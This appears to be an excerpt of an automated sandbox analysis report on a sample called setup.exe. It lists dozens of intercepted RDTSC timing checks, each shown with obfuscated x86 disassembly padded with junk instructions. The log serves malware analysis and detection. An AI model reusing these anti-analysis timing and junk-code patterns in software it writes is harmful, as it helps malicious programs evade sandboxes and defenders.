Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 55B773 second address: 55B777 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 55B777 second address: 55B77D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 55B77D second address: 55B793 instructions: 0x00000000 rdtsc 0x00000002 jg 00007FEA5CDC3A18h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp+04h], eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edi 0x00000012 pop edi 0x00000013 pop eax 0x00000014 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 55BA5F second address: 55BA65 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 55BA65 second address: 38EA65 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 xor dword ptr [esp], 6C815961h 0x0000000c jns 00007FEA5CDC3A17h 0x00000012 clc 0x00000013 push dword ptr [ebp+122D08D1h] 0x00000019 clc 0x0000001a call dword ptr [ebp+122D1AE7h] 0x00000020 pushad 0x00000021 sub dword ptr [ebp+122D2598h], esi 0x00000027 xor eax, eax 0x00000029 jl 00007FEA5CDC3A1Eh 0x0000002f pushad 0x00000030 and ebx, 02F1AD41h 0x00000036 popad 0x00000037 mov edx, dword ptr [esp+28h] 0x0000003b js 00007FEA5CDC3A22h 0x00000041 jnc 00007FEA5CDC3A1Ch 0x00000047 mov dword ptr [ebp+122D3907h], eax 0x0000004d pushad 0x0000004e jns 00007FEA5CDC3A1Ch 0x00000054 pushad 0x00000055 xor dx, 11A2h 0x0000005a mov di, si 0x0000005d popad 0x0000005e popad 0x0000005f mov esi, 0000003Ch 0x00000064 jmp 00007FEA5CDC3A21h 0x00000069 add esi, dword ptr [esp+24h] 0x0000006d jg 00007FEA5CDC3A1Ch 0x00000073 stc 0x00000074 lodsw 0x00000076 or dword ptr [ebp+122D1A94h], eax 0x0000007c add eax, dword ptr [esp+24h] 0x00000080 clc 0x00000081 mov ebx, dword ptr [esp+24h] 0x00000085 mov dword ptr [ebp+122D1A94h], ecx 0x0000008b nop 0x0000008c push eax 0x0000008d push edx 0x0000008e push edi 0x0000008f push eax 0x00000090 push edx 0x00000091 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4ECC7D second address: 4ECC8E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 jg 00007FEA5C6FB9EAh 0x0000000d rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4ECC8E second address: 4ECC93 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 561D27 second address: 561D31 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007FEA5C6FB9E6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 561D31 second address: 561D46 instructions: 0x00000000 rdtsc 0x00000002 jg 00007FEA5CDC3A16h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b jnp 00007FEA5CDC3A2Ch 0x00000011 push eax 0x00000012 push edx 0x00000013 push edi 0x00000014 pop edi 0x00000015 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 5623C4 second address: 5623E9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 jmp 00007FEA5C6FB9F8h 0x0000000a push eax 0x0000000b push edx 0x0000000c jp 00007FEA5C6FB9E6h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 5623E9 second address: 56240B instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 js 00007FEA5CDC3A16h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007FEA5CDC3A23h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 56240B second address: 562426 instructions: 0x00000000 rdtsc 0x00000002 jg 00007FEA5C6FB9F3h 0x00000008 jmp 00007FEA5C6FB9EDh 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 push ecx 0x00000012 pop ecx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 562426 second address: 56242A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 56242A second address: 562430 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 5625AE second address: 5625BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FEA5CDC3A1Ah 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 5625BE second address: 5625CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 568333 second address: 568343 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a js 00007FEA5CDC3A16h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 501207 second address: 501220 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop ecx 0x00000007 pushad 0x00000008 jmp 00007FEA5C6FB9EDh 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 566DFA second address: 566E0E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEA5CDC3A20h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 566F6A second address: 566F79 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jnp 00007FEA5C6FB9EAh 0x0000000b push ebx 0x0000000c pop ebx 0x0000000d push edx 0x0000000e pop edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 566F79 second address: 566F8B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FEA5CDC3A1Eh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 5670E5 second address: 567104 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEA5C6FB9ECh 0x00000007 jmp 00007FEA5C6FB9EBh 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 567104 second address: 567108 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 567108 second address: 56710E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 56710E second address: 567114 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 56726C second address: 567270 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 5673EC second address: 567401 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FEA5CDC3A1Fh 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 567708 second address: 56770E instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 56770E second address: 567714 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 567D1C second address: 567D2C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEA5C6FB9ECh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 567D2C second address: 567D32 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 51F9F2 second address: 51F9F6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 56C884 second address: 56C888 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 56C888 second address: 56C891 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 56C891 second address: 56C896 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 56C896 second address: 56C8A7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push edx 0x00000006 pop edx 0x00000007 pushad 0x00000008 popad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 53E2B0 second address: 53E2BD instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pushad 0x00000004 popad 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 53E2BD second address: 53E2DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FEA5C6FB9F6h 0x00000009 popad 0x0000000a push esi 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 53E74D second address: 38EA65 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jo 00007FEA5CDC3A16h 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e mov dword ptr [esp], eax 0x00000011 mov cl, al 0x00000013 push dword ptr [ebp+122D08D1h] 0x00000019 mov ecx, dword ptr [ebp+12470419h] 0x0000001f mov di, 7B6Bh 0x00000023 call dword ptr [ebp+122D1AE7h] 0x00000029 pushad 0x0000002a sub dword ptr [ebp+122D2598h], esi 0x00000030 xor eax, eax 0x00000032 jl 00007FEA5CDC3A1Eh 0x00000038 pushad 0x00000039 and ebx, 02F1AD41h 0x0000003f popad 0x00000040 mov edx, dword ptr [esp+28h] 0x00000044 js 00007FEA5CDC3A22h 0x0000004a jnc 00007FEA5CDC3A1Ch 0x00000050 mov dword ptr [ebp+122D3907h], eax 0x00000056 pushad 0x00000057 jns 00007FEA5CDC3A1Ch 0x0000005d pushad 0x0000005e xor dx, 11A2h 0x00000063 mov di, si 0x00000066 popad 0x00000067 popad 0x00000068 mov esi, 0000003Ch 0x0000006d jmp 00007FEA5CDC3A21h 0x00000072 add esi, dword ptr [esp+24h] 0x00000076 jg 00007FEA5CDC3A1Ch 0x0000007c stc 0x0000007d lodsw 0x0000007f or dword ptr [ebp+122D1A94h], eax 0x00000085 add eax, dword ptr [esp+24h] 0x00000089 clc 0x0000008a mov ebx, dword ptr [esp+24h] 0x0000008e mov dword ptr [ebp+122D1A94h], ecx 0x00000094 nop 0x00000095 push eax 0x00000096 push edx 0x00000097 push edi 0x00000098 push eax 0x00000099 push edx 0x0000009a rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 53E7D3 second address: 53E803 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FEA5C6FB9E6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b pushad 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f pushad 0x00000010 popad 0x00000011 popad 0x00000012 jmp 00007FEA5C6FB9F4h 0x00000017 popad 0x00000018 mov eax, dword ptr [esp+04h] 0x0000001c pushad 0x0000001d push eax 0x0000001e push edx 0x0000001f push ebx 0x00000020 pop ebx 0x00000021 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 53E803 second address: 53E824 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 pushad 0x00000008 popad 0x00000009 pop eax 0x0000000a popad 0x0000000b mov eax, dword ptr [eax] 0x0000000d jmp 00007FEA5CDC3A1Bh 0x00000012 mov dword ptr [esp+04h], eax 0x00000016 push ecx 0x00000017 push eax 0x00000018 push edx 0x00000019 push edx 0x0000001a pop edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 53E824 second address: 53E861 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 pop eax 0x00000008 push 00000000h 0x0000000a push ebp 0x0000000b call 00007FEA5C6FB9E8h 0x00000010 pop ebp 0x00000011 mov dword ptr [esp+04h], ebp 0x00000015 add dword ptr [esp+04h], 0000001Ch 0x0000001d inc ebp 0x0000001e push ebp 0x0000001f ret 0x00000020 pop ebp 0x00000021 ret 0x00000022 sub edi, dword ptr [ebp+122D37C7h] 0x00000028 push C1CAAFCCh 0x0000002d push eax 0x0000002e push edx 0x0000002f push eax 0x00000030 push edx 0x00000031 pushad 0x00000032 popad 0x00000033 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 53E861 second address: 53E865 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 53E865 second address: 53E86B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 53E86B second address: 53E871 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 53E871 second address: 53E875 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 53E875 second address: 53E879 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 53E94C second address: 53E950 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 53EC86 second address: 53EC90 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 53EC90 second address: 53EC94 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 53EC94 second address: 53ECB2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 nop 0x00000008 mov dword ptr [ebp+122D1C4Ch], esi 0x0000000e add dword ptr [ebp+122D1C91h], edx 0x00000014 push 00000004h 0x00000016 mov edi, ecx 0x00000018 push eax 0x00000019 pushad 0x0000001a push eax 0x0000001b push edx 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 53ECB2 second address: 53ECB6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 53EFE4 second address: 53F054 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEA5CDC3A23h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b jmp 00007FEA5CDC3A1Dh 0x00000010 ja 00007FEA5CDC3A2Fh 0x00000016 jmp 00007FEA5CDC3A29h 0x0000001b popad 0x0000001c nop 0x0000001d or cx, DF3Ch 0x00000022 push 0000001Eh 0x00000024 jmp 00007FEA5CDC3A1Ch 0x00000029 push eax 0x0000002a push eax 0x0000002b push edx 0x0000002c push eax 0x0000002d push edx 0x0000002e jmp 00007FEA5CDC3A21h 0x00000033 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 53F054 second address: 53F05A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 53F05A second address: 53F060 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 53F060 second address: 53F064 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 53F40D second address: 53F428 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEA5CDC3A1Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jno 00007FEA5CDC3A18h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 56CD27 second address: 56CD2D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 56CD2D second address: 56CD33 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 56CD33 second address: 56CD37 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 56CD37 second address: 56CD3B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 56D533 second address: 56D54A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FEA5C6FB9EAh 0x00000008 push edi 0x00000009 pop edi 0x0000000a jnl 00007FEA5C6FB9E6h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 56D6B7 second address: 56D6BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 56D6BD second address: 56D6C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 56D6C4 second address: 56D6C9 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 56D6C9 second address: 56D6CF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 56D6CF second address: 56D6D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 56D6D7 second address: 56D6DF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 56D6DF second address: 56D6F8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b js 00007FEA5CDC3A1Eh 0x00000011 push ecx 0x00000012 pop ecx 0x00000013 je 00007FEA5CDC3A16h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 56D6F8 second address: 56D70C instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 pop edi 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FEA5C6FB9ECh 0x0000000d rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 573F02 second address: 573F11 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 push eax 0x00000008 push edx 0x00000009 jl 00007FEA5CDC3A16h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 579FE4 second address: 579FFA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007FEA5C6FB9EBh 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e push ebx 0x0000000f pop ebx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 57900A second address: 57900F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 57CF0F second address: 57CF28 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEA5C6FB9F3h 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 57CF28 second address: 57CF2D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4F3903 second address: 4F3911 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FEA5C6FB9E6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4F3911 second address: 4F3917 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4F3917 second address: 4F3922 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 push esi 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 57CA80 second address: 57CA8E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jbe 00007FEA5CDC3A16h 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 57CA8E second address: 57CAA5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEA5C6FB9EBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jnc 00007FEA5C6FB9E6h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 57CAA5 second address: 57CABB instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 jnp 00007FEA5CDC3A16h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c popad 0x0000000d push esi 0x0000000e je 00007FEA5CDC3A1Eh 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 57CBE3 second address: 57CBF3 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 jns 00007FEA5C6FB9E6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 57CBF3 second address: 57CC07 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FEA5CDC3A20h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 57CC07 second address: 57CC11 instructions: 0x00000000 rdtsc 0x00000002 jns 00007FEA5C6FB9E6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 57CC11 second address: 57CC17 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 57CC17 second address: 57CC1D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 586CCA second address: 586CD6 instructions: 0x00000000 rdtsc 0x00000002 jp 00007FEA5CDC3A16h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 586CD6 second address: 586CDC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
